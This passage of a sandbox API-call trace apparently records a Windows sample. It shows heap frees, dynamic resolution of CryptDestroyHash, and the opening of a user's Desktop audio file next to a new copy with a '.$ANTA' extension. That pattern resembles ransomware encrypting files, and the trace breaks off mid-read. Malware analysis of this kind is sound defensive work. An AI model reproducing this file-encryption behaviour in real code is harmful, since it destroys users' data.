hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.101] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0120.101] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.101] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0120.101] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0120.102] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0120.102] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0120.102] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0120.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0120.103] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0120.103] CryptDestroyHash (hHash=0x41ac280) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0120.104] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.106] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0120.106] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0120.106] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.106] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.107] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\9pzjqif.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0120.107] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.107] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.107] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0120.107] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0120.108] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0120.108] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\9pzjqif.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0120.111] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0120.111] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, 